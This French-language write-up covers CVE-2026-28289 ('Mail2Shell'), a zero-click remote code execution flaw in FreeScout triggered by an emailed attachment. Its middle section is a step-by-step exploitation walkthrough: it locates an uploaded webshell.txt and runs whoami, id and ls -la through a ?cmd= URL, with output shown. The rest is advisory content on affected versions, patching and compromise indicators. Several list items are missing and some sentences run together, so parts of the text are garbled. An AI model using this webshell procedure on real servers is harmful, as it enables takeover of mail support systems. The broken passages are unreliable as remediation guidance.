
CVE-2026-28289

RCE Zero-Click non authentifiée dans FreeScout via un contournement de pièce jointe par e-mail
CVE-2026-28289, surnommée Mail2Shell, est une vulnérabilité critique d'exécution de code à distance (RCE) zero-click affectant FreeScout.
Un attaquant peut envoyer un e-mail spécialement conçu à une boîte aux lettres FreeScout et obtenir un accès shell distant au serveur sous-jacent — sans authentification et sans interaction de l'utilisateur.
| Champ | Valeur |
|---|
| Identifiant CVE | CVE-2026-28289 |
| Gravité | 🔴 Critique |
| CVSS | 10.0 (Maximum) |
| Vecteur d'attaque | À distance (E-mail) |
| Authentification requise | ❌ Aucune |
| Interaction utilisateur | ❌ Aucune |
| Impact | Compromission totale du serveur |
L'attaquant envoie un e-mail avec une pièce jointe spécialement conçue.
FreeScout tente de bloquer les fichiers dangereux comme .htaccess, mais l'attaquant :
L'attaquant accède au fichier téléversé via le chemin web et exécute des commandes arbitraires.
Résultat :
# Remote shell access achieved
whoami
www-data

✅ Email sent successfully! (Zero-Click RCE triggered)
Vous verrez également les instructions pour les prochaines étapes imprimées.
find sur votre serveur FreeScout via SSHElle retournera immédiatement le chemin réel complet du fichier téléversé, par exemple :
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(ou un dossier similaire date/heure — cela confirme que FreeScout a enregistré la pièce jointe automatiquement).
Copiez le chemin de l'étape 2 et ouvrez cette URL :
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
Vous verrez cette sortie exacte (texte brut) :
www-data
(Ou quel que soit l'utilisateur Apache/PHP sur votre serveur — généralement www-data, apache, ou nobody).
Maintenant changez la commande et actualisez :
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
Vous verrez :
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Et pour ls -la :
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
Cette sortie apparaît directement dans la page du navigateur (dans des balises <pre> du webshell). Pas d'erreur, pas de code source PHP, pas de 404.
Cela signifie que vous avez une exécution de code à distance complète sur le serveur — le contournement .htaccess + espace de largeur nulle a parfaitement fonctionné, et la pièce jointe a été traitée sans aucune interaction utilisateur.
Toutes les versions de FreeScout :
<= 1.8.206
Mettez à jour immédiatement vers :
1.8.207 ou ultérieure
AllowOverride All dans la configuration ApacheRecherchez :
.htaccess suspects/storage/attachments/Les indicateurs de compromission peuvent inclure :
.htaccess inconnus dans les dossiers de pièces jointesEmail → Malicious Attachment (Unicode prefixed filename)
↓
Saved to predictable path
↓
Web-accessible execution
↓
Remote shell
Ce problème a contourné les protections ajoutées dans :
Démontrant une logique de nettoyage de noms de fichiers incomplète.
| Domaine de risque | Impact |
|---|---|
| Confidentialité | 🔴 Élevé |
| Intégrité | 🔴 Élevé |
| Disponibilité | 🔴 Élevé |
Si vous exécutez une instance auto-hébergée de FreeScout :
🔥 Corrigez immédiatement. 💡 Supposez une compromission si vous exécutez des versions vulnérables exposées à Internet. 🛡 Effectuez une revue des journaux et des vérifications d'intégrité.